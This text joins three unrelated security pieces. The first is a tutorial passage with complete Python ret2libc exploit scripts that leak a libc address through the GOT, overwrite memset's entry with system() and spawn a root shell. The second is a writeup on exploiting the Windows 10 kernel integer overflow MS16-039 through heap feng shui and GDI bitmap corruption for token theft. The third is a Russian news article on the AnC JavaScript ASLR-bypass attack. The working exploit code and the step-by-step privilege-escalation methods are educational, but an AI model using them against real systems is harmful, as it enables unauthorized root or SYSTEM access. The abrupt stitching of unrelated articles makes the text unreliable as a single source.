0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

MS16-039 — «Windows 10» 64 bits Integer Overflow exploitation by using GDI objects

On April 12, 2016 Microsoft released 13 security bulletins.
Let’s to talk about how I triggered and exploited the CVE-2016-0165, one of the MS16-039 fixes.

Diffing Stage

For  MS16-039, Microsoft released a fix for all Window versions, either for 32 and 64 bits.
Four vulnerabilities were fixed: CVE-2016-0143, CVE-2016-0145, CVE-2016-0165 y CVE-2016-0167.

Diffing «win32kbase.sys» (v10.0.10586.162 vs v10.0.10586.212), I found 26 changed functions.
Among all the functions that had been changed, I focused on a single function: «RGNMEMOBJ::vCreate».

ms16-039-diff

It’s interesting to say that this function started to be exported since Windows 10, when «win32k.sys» was split into 3 parts:  «win32kbase.sys», «win32kfull.sys» and a very small version of «win32k.sys».

If we look at the diff between the old and the new function version, we can see on the right side that in the first red basic block (left-top), there is a call to «UIntAdd» function.
This new basic block checks that the original instruction «lea eax,[rdi+1]» (first instruction on the left-yellow basic block) won’t produce an integer overflow when the addition is made.

In the second red basic block (right-down) there is a call to «UIntMult» function.
This function checks that the original instruction «lea ecx,[rax+rax*2]» (third instruction on the left-yellow basic block) won’t produce an integer overflow when the multiplication is made.

Summing up, two integer overflows were patched in the same function.

ms16-039-fdiff

Understanding the fix

If we look at the 3rd instruction of the original basic block (left-yellow), we can see this one:

"lea ecx,[rax+rax*2]"

In this addition/multiplication, the «rax» register represents the number of POINT structs to be handled.
In this case, this number is multiplied by 3 (1+1*2).

At the same time, we can see that the structs number is represented by a 64 bit register, but the destination of this calculation is a 32 bit register!

Now, we know that it’s an integer overflow, the only thing we need to know is what number multiplied by 3 gives us a bigger result than 4GB.
The idea is that this result can’t be represented by a 32 bit number.

A simple way to know that is making the next calculation:

(4,294,967,296 (2^32) / 3) + 1 = 1,431,655,766 (0x55555556)

Now, if we multiplied this result by 3, we will obtain the next one:

 0x55555556 x 3 = 0x1'0000'0002 = 4GB + 2 bytes

In the same basic block and two instructions below («shl ecx,4»), we can see that the number «2» obtained previously will be shifted 4 times to the left, which is the same to multiply this one by 16, resulting in the 0x20 value.

So, the «PALLOCMEM2» function is going to allocate 0x20 bytes to be used by 0x55555556 POINT structs … 🙂

Path to the vulnerability

For the development of this exploit, the path I took was via the «NtGdiPathToRegion» function, located in «win32kfull.sys».
This function calls directly to the vulnerable function.

NtGdiPathToRegion

From user space, this function is located in «gdi32.dll» and it’s exported as «PathToRegion«.

Triggering the vulnerability

Now we know the bug, we need 0x55555556 POINT structs to trigger this vulnerability but, is it possible to
reach this number of POINTs?

In the exploit I wrote, the function that I used to create POINT structs was «PolylineTo«.

Looking at the documentation, we see this definition:

BOOL PolylineTo(
 _In_ HDC hdc,
 _In_ const POINT *lppt,
 _In_ DWORD cCount
 );

The second argument is a POINT struct array and the third one is the array size.

It’s easy to think that, if we create 0x55555556 structs and then, we pass this structures as parameter we will trigger the vulnerability but WE WON’T, let’s see why.

If we analyze the «PolylineTo» internal code, we can see a call to «NtGdiPolyPolyDraw».

PolylineTo

«NtGdiPolyPolyDraw» is located in «win32kbase.sys», part of the Windows kernel.

If we see this function, there is a check in the POINT struct number passed as argument:

NtGdiPolyPolyDraw

The maximum POINTs number that we can pass as parameter is 0x4E2000.

It’s clear that there is not a direct way to reach the wanted number to trigger this vulnerability, so what is the trick ?

Well, after some tests, the answer was pretty simple: «call many times to PolylineTo until reach the wanted number of POINT structs».

And the result was this:

ms16_039-bad-pool

The trick is to understand that the «PathToRegion» function processes the sum of all POINT structs assigned to the HDC passed as argument.

PALLOCMEM2 function — «Bonus Track»

Triggering this vulnerability is relatively easy in 64 bit targets like Windows 8, 8.1 y 10.
Now, in «Windows 7» 64 bits, the vulnerability is very difficult to exploit.

Let’s see the vulnerable basic block and the memory allocator function:

ms16-039-w7-io1

The destination of the multiplication by 3 is a 64 bit register (rdx), not a 32 bit register like Windows versions mentioned before.

The only feasible way to produce an integer overflow is with the previous instruction:

ms16-039-w7-io2

In this case, the number of POINTs to be assigned to the HDC should be greater than or equal to 4GB.
Unfortunately, during my tests it was easier to get a kernel memory exhaustion than allocate this number of structures.

Now, why Windows 7 is different to the latest Windows versions ?

Well, if we look the previous picture, we can see that there is a call to «__imp_ExAllocatePoolWithTag», instead of «PALLOCMEM2».

What is the difference ?

The «PALLOCMEM2» function receives a 32 bit argument size, but the  «__imp_ExAllocatePoolWithTag» function receives a 64 bit argument size.
The argument type defines how the result of the multiplication will be passed to the function allocator, in this case, the result is casted to «unsigned int».

We could guess that functions that used to call «__imp_ExAllocatePoolWithTag» in Windows 7 and now they call «PALLOCMEM2» have been exposed to integer overflows much easier to exploit.

Analyzing the heap overflow

Once we trigger the integer overflow, we have to understand what the consequences are.

As a result, we obtain a heap overflow produced by the copy of POINT structs, via the «bConstructGET» function (child of the vulnerable function), where every single struct is copied by «AddEdgeToGet».

heap_overlfow_callgraph

This heap overflow is produced when POINT structs are converted and copied to the small allocated memory.

It’s intuitive to think that, if 0x55555556 POINT structs were allocated, the same number will be copied.
If this were true, we would have a huge «memcpy» that it would destroy a big part of the Windows kernel heap, which quickly would give us a BSoD.

What makes it a nice bug is that the «memcpy» can be controlled exactly with the number of POINTs that we want, regardless of the total number passed to the the vulnerable function.

The trick here is that only POINT structs are copied when coordinates ARE NOT REPEATED.
E.g: if «POINT.A is X=30/Y=40» and «POINT.B is X=30/Y=40», only one will be copied.

Thus, it’s possible to control exactly how many structures will be used by the heap overflow.

Some exploitation considerations

One of the most important things to know before to start to write the exploit is that, the vulnerable function allocates memory and produces the heap overflow, but when this function finishes, it frees the allocated memory, since this is used only temporarily.

ms16_039-alloc-free

It means that, when the memory is freed, the Windows kernel will check the current heap chunk header and the next one.
If the next one is corrupted, we will get a BSoD.

Unfortunately, only some values to be overwritten are totally controlled by us, so, we are not able to overwrite the next chunk header with its original content.

On the other hand, we could think the alloc/free operation like «atomic», because we don’t have control execution until the «PathToRegion» function returns.

So, How is it possible to successfully exploit this vulnerability ?

Four years ago I explained something similar in the»The Big Trick Behind Exploit MS12-034» blogpost.

Without a deep reading of the blogpost previously mentioned, the only thing to know is that if the allocated memory chunk is at the end of the 4KB memory page, THERE WON’T BE A NEXT CHUNK HEADER.

So, if the vulnerable function is able to allocate at the end of the memory page, the heap overflow will be done in the next page.
It means that the DATA contained by the second memory page will be corrupted but, we will avoid a BSoD when the allocated memory is freed.

Finding the best memory allocator

Considering the previous one, now it’s necessary to create a very precise heap spray to be able to allocate memory at the end of the memory page.

ms16-039-chunk

When heap spray requires several interactions, meaning that memory chunks are allocated and freed many times, the name used for this technique is «Heap Feng Shui», making reference to the ancient Chinese technique (https://en.wikipedia.org/wiki/Feng_shui).

The POOL TYPE used by the vulnerable function is 0x21, which according to Microsoft means «NonPagedPoolSession» + «NonPagedPoolExecute».

Knowing this, it’s necessary to find some function that allow us to allocate memory in this pool type with the best possible accuracy.

The best function that I have found to heap spray the pool type 0x21 is via the «ZwUserConvertMemHandle» undocumented function, located in «gdi32.dll» and «user32.dll».

ZwUserConvertMemHandle

When this function is called from user space, the «NtUserConvertMemHandle» function is invoked in kernel space, and this one calls «ConvertMemHandle», both located in «win32kfull.sys».

If we look at the «ConvertMemHandle» code, we can see the perfect allocator:

ConvertMemHandle

Basically, this function receives 2 parameters, BUFFER and SIZE and returns a HANDLE.

If we only see the yellow basic blocks, we can see that the «HMAllocObject» function allocates memory through «HMAllocObject».
This function allocates SIZE + 0x14 bytes.
After that, our DATA is copied by «memcpy» to this new memory chunk and it will stay there until it’s freed.

To free the memory chunk created by «NtUserConvertMemHandle», we have to call two functions consecutively: «SetClipboardData» and «EmptyClipboard«.

Summing up, we have a function that allows us to allocate and free memory in the same place where the heap overflow will be done.

Choosing GDI objects to be overwritten

Now, we know how to make a good Heap Feng Shui, we need to find something interesting to be corrupted by the heap overflow.

Considering Diego Juarez’s blogpost «Abusing GDI for ring0 exploit primitives» and exchanging some ideas with him, we remembered that GDI objects are allocated in the pool type 0x21, which is exactly what I needed to exploit this vulnerability.

In that blogpost he described how GDI objects are composed:

typedef struct
 {
   BASEOBJECT64 BaseObject;
   SURFOBJ64 SurfObj;
   [...]
 } SURFACE64;

As explained in the blogpost mentioned above, if the «SURFOBJ64.pvScan0» field is overwritten, we could read or write memory where we want by calling «GetBitmapBits/SetBitmapBits».

In my case, the problem is that I don’t control all values to be overwritten by the heap overflow, so, I can’t overwrite this property with an USEFUL ADDRESS.

A variant of abusing GDI object

Taking into account the previous information, I decided to find another GDI object property to be overwritten by the heap overflow.

After some tests, I found a very interesting thing, the «SURFOBJ64.sizlBitmap» field.
This field is a SIZE struct that defines width and height of the GDI object.

This picture shows the content of the GDI object, before and after the heap overflow:
ms16_039-heap-overflow

The final result is that the «cx» property of the «SURFOBJ64.sizlBitmap» SIZE struct is set with the 0xFFFFFFFF value.
It means that now the GDI object is width=0xFFFFFFFF and height=0x01.

So, we are able to read/write contiguous memory far beyond the original limits set for «SURFOBJ64.pvScan0»!

Another interesting thing to know is that, when GDI objects are smaller than 4KB, the DATA pointed by «SURFOBJ64.pvScan0» is contiguous to the object properties.

With all these things, it was time to write an exploit …

Exploitation — Step 1

In the exploit I wrote, I used 0x55555557 POINT structs, which is one more point than what I gave as an example.

So, the new calculation is:

0x55555557 x 3 = 0x1'0000'0005

As the result is a 32 bit number, we get 0x5, an then this number is multiplied by 16

0x5 << 4 = 0x50

It means that «PALLOCMEM2» function will allocate 0x50 bytes when the vulnerable function calls it.

The reason why I decided to increase the size by 0x30 bytes is because very small chunk allocations are not always predictable.

Adding the chunk header size (0x10 bytes), the heap spray to do should be like this:ms16_039-heap-spray-candidate

Looking at the previous picture, only one FREE chunk will be used by the vulnerable function.
When this happens, there will be a GDI object next to this one.

For alignment problems between the used small chunk and the «SURFOBJ64.sizlBitmap.cx» property, it was necessary to use an extra PADDING chunk.
It means that three different memory chunks were used to make this heap feng shui.

Hitting a breakpoint after the memory allocation, we can see how the heap spray worked and what position, inside the 4KB memory page, was used by the vulnerable function.

ms16-039-heap-spray

Making some calculations, we can see that if we add «0x60 + 0xbf0» bytes to the allocated chunk, we get the first GDI object (Gh15) next to it.

Exploitation — Step 1.5

Once a GDI object has been overwritten by the heap overflow, it’s necessary to know which one it is.

As the heap spray uses a big number of GDI objects, 4096 in my case, the next step is to go through the GDI object array and detect which has been modified by calling «GetBitmapBits».
When this function is able to read beyond the original object limits, it means that the overwritten GDI object has been found.

Looking at the function prototype:

HBITMAP CreateBitmap(
 _In_ int nWidth,
 _In_ int nHeight,
 _In_ UINT cPlanes,
 _In_ UINT cBitsPerPel,
 _In_ const VOID *lpvBits
 );

As an example, we could create a GDI object like this:

CreateBitmap (100, 100, 1, 32, lpvBits);

Once the object has been created, if we call «GetBitmapBits» with a size bigger than 100 x 100 x 4 bytes (32 bits) it will fail, except if this object has been overwritten afterwards.

So, the way to detect which GDI object has been modified is to check when its behavior is different than expected.

Exploitation — Step 2

Now we can read/write beyond the GDI object limits, we could use this new skill to overwrite a second GDI object, and thus, to get an arbitrary write.

Looking at our heap spray, we can see that there is a second GDI object located 0x1000 bytes after from the first one.

ms16-039-gdi-secuence

So, if from the first GDI object, we are able to write the contiguous memory that we want, it means that we can modify the «SURFOBJ64.pvScan0» property of the second one.

Then, if we use the second GDI object by calling «GetBitmapBits/SetBitmapBits», we are able to read/write where we want to because we control exactly which address will be used.

Thus, if we repeat the above steps, we are able to read/write ‘n’ times any kernel memory address from USER SPACE, and at the same time, we will avoid running ring-0 shellcode in kernel space.

It’s important to say that before overwriting the «SURFOBJ64.pvScan0» property of the second GDI object, we have to read all DATA between both GDI objects, and then overwrite the same data up to the property we want to modify.

On the other hand, it’s pretty simple to detect which is the second GDI object, because when we read DATA between both objects, we are getting a lot of information, including its HANDLE.

Summing up, we use the heap overflow to overwrite a GDI object, and from this object to overwrite a second GDI object next to it.

Exploitation — Final Stage

Once we get a kernel read/write primitive, we could say that the last step is pretty simple.

The idea is to steal the «System» process token and set it to our process (exploit.exe).

As this attack is done from «Low Integrity Level», we have to know that it’s not possible to get TOKEN addresses by calling «NtQuerySystemInformation» («SystemInformationClass = SystemModuleInformation»), so, we have to take the long way.

The EPROCESS list is a linked list, where every element is a EPROCESS struct that contains information about a unique running process, including its TOKEN.

This list is pointed by the «PsInitialSystemProcess» symbol, located in «ntoskrnl.exe».
So, if we get the Windows kernel base, we could get the «PsInitialSystemProcess» kernel address, and then to do the famous TOKEN KIDNAPPING.

The best way I know of leaking a Windows kernel address is by using the «sidt» user-mode instruction.
This instruction returns the size and address of the operating system interrupt list located in kernel space.

Every single entry contains a pointer to its interrupt handler located in «ntoskrnl.exe».
So, if we use the primitive we got previously, we are able to read these entries and get one «ntoskrnl.exe» interrupt handler address.

The next step is to read backwards several «ntoskrnl.exe» memory addresses until you find the well known «MZ», which means it’s the base address of «ntoskrnl.exe».

Once we get the Windows kernel base, we only need to know what the «PsInitialSystemProcess» kernel address is.
Fortunately, from USER SPACE it’s possible to use the «LoadLibrary» function to load «ntoskrnl.exe» and then to use «GetProcAddress» to get the «PsInitialSystemProcess» relative offset.

As a result of what I explained before, I obtained this:

ms16-039-exploitation

Final notes

It’s important to say that it wasn’t necessary to use the GDI objects memory leak explained by the «Abusing GDI for ring0 exploit primitives» blogpost.

However, it’s interesting to see how «Windows 10» 64 bits can be exploited from «Low Integrity Level» through kernel vulnerabilities, despite all kernel exploit mitigations implemented until now.

Derandomization of ASLR on any modern processors using JavaScript

 


Запись обращений к кэшу устройством управления памятью (MMU) в процессоре по мере вызова страниц по особому паттерну, разработанному для выявления различий между разными уровнями иерархии таблиц. Например, паттерн «лесенки» (слева) указывает на первый уровень иерархии, то есть PTL1, при вызове страниц по 32K. Для других уровней иерархии тоже есть методы выявленияПятеро исследователей из Амстердамского свободного университета (Нидерланды) доказали фундаментальную уязвимость техники защиты памяти ASLR на современных процессорах. Они выложили исходный код и подробное описание атаки AnC (ASLR⊕Cache), которой подвержены практически все процессоры.

Исследователи проверили AnC на 22 процессорах разных архитектур — и не нашли ни одного, который был бы защищён от такого рода атаки по стороннему каналу. Это и понятно, ведь во всех процессорах используется буфер динамической трансляции для кэширования адресов памяти, которые транслируются в виртуальные адреса. Защититься от этой атаки можно только отключив кэш процессора.

Рандомизация размещения адресного пространства (ASLR) — технология, применяемая в операционных системах, при использовании которой случайным образом изменяется расположение в адресном пространстве процесса важных структур данных, а именно образов исполняемого файла, подгружаемых библиотек, кучи и стека. Технология создана для усложнения эксплуатации нескольких типов уязвимостей. Предполагается, что она должна защищать память от эксплойтов с переполнением буфера — якобы ASLR не даст злоумышленнику узнать, по какому конкретно адресу размещаются структуры данных после переполнения, куда можно записать шелл-код.

В прошлом исследователи несколько раз показывали, что защиту ASLR можно обойти в некоторых случаях. Например, если у злоумышленника есть полные права в системе, он может сломать ASLR на уровне ядра ОС. Но в типичных условиях — против атаки через браузер — ASLR считалась вполне надёжной защитой. Теперь нет.

В 2016 году эта же группа голландских специалистов показала, как с помощью JavaScript обойти защиту ASLR в браузере Microsoft Edge, используя атаку по стороннему каналу дедупликации памяти. Microsoft быстро отключила дедубликацию памяти, чтобы защитить своих пользователей. Но это не решило проблему ASLR на фундаментальном уровне, связанную с работой самого устройства управления памятью (MMU) в процессорах.

В современных процессорах модуль MMU использует иерархию кэша для улучшения производительности прохода по иерархическим таблицам страниц в памяти. Это неотъемлемая функция современных процессоров. Корень проблемы в том, что кэш L3 доступен для любых сторонних приложений, в том числе скриптов JavaScript из браузера.


Организация памяти в современном процессоре Intel

Хакеры сумели определить средствами JavaScript, к каким страницам в таблицах страниц чаще всего обращается модуль MMU. Точность определения вполне достаточна для обхода ASLR даже с энтропией 36 бит.

Принцип атаки

Принцип атаки ASLR⊕Cache основан на том, что в результате прохода MMU по таблицам страниц происходит их запись в кэш процессора. Эта операция осуществляется и во время трансляции виртуального адреса в соответствующий ему физический адрес в памяти. Таким образом, буфер динамической трансляции (TLB) в каждом процессоре всегда хранит самые последние трансляции адресов.

Если происходит промах мимо кэша TLB, то модулю MMU придётся пройти по всем таблицам страниц конкретного процесса (тоже хранящимся в основной памяти), чтобы выполнить трансляцию. Для улучшения производительности MMU в такой ситуации таблицы страниц кэшируются в быстром кэше процессора L3 для ускорения доступа к ним.

Получается, что при использовании механизма безопасности ASLR сами таблицы страниц становятся хранителем секретной информации: начальный номер записи таблицы страниц (через offset) на каждом уровне содержит часть секретного виртуального адреса, который использовался при трансляции.


Проход MMU по таблице страниц для трансляции адреса 0x644b321f4000 в соответствующую страницу памяти на архитектуре x86_64

Хакеры разработали специальную технику сканирования памяти (им нужны были таймеры получше, чем есть в браузерах), чтобы определить наборы кэша (конкретные строки в секторированном кэше прямого отображения), к которым обращается MMU после таргетированного прохода по таблицам страниц, когда происходит разыменование указателя данных или исполнение инструкции кода. Поскольку только определённые адреса могут соответствовать определённым наборам кэша, то получение информации об этих наборах выдаёт начальные номера записей нужных записей таблиц страниц на каждом уровне иерархии — и, таким образом, дерандомизирует ASLR.

Исследователи протестировали эксплойт в Chrome и Firefox на 22-ти современных процессорах и показали его успешную работу.


Успешность атаки в Chrome и Firefox и процент ложных срабатываний

Не спасают даже встроенные механизмы защиты вроде умышленной поломки разработчиками браузеров точного JavaScript-таймера performance.now().


Сломанный таймер performance.now() в Chrome и Firefox

Авторы эксплойта написали собственный таймер.

Демонстрация атаки в Firefox

Атака проверена на следующих процессорах:

Модель процессора Микроархитектура Год
Intel Xeon E3-1240 v5 Skylake 2015
Intel Core i7-6700K Skylake 2015
Intel Celeron N2840 Silvermont 2014
Intel Xeon E5-2658 v2 Ivy Bridge EP 2013
Intel Atom C2750 Silvermont 2013
Intel Core i7-4500U Haswell 2013
Intel Core i7-3632QM Ivy Bridge 2012
Intel Core i7-2620QM Sandy Bridge 2011
Intel Core i5 M480 Westmere 2010
Intel Core i7 920 Nehalem 2008
AMD FX-8350 8-Core Piledriver 2012
AMD FX-8320 8-Core Piledriver 2012
AMD FX-8120 8-Core Bulldozer 2011
AMD Athlon II 640 X4 K10 2010
AMD E-350 Bobcat 2010
AMD Phenom 9550 4-Core K10 2008
Allwinner A64 ARM Cortex A53 2016
Samsung Exynos 5800 ARM Cortex A15 2014
Samsung Exynos 5800 ARM Cortex A7 2014
Nvidia Tegra K1 CD580M-A1 ARM Cortex A15 2014
Nvidia Tegra K1 CD570M-A1 ARM Cortex A15; LPAE  2014

К сожалению, описание этой техники в открытом доступе может снова сделать эффективными старые способы атаки на кэш, от которых вроде бы уже давно защитились.

В данный момент атака AnC задокументирована в четырёх бюллетенях безопасности:

  • CVE-2017-5925 — для процессоров Intel;
  • CVE-2017-5926 — для процессоров AMD;
  • CVE-2017-5927 — для процессоров ARM;
  • CVE-2017-5928 — для JavaScript-тайеров в разных браузерах.

По мнению авторов, единственным способом защиты для пользователя является использование программ вроде NoScript, которые блокирует выполнение сторонних скриптов JavaScript в браузере.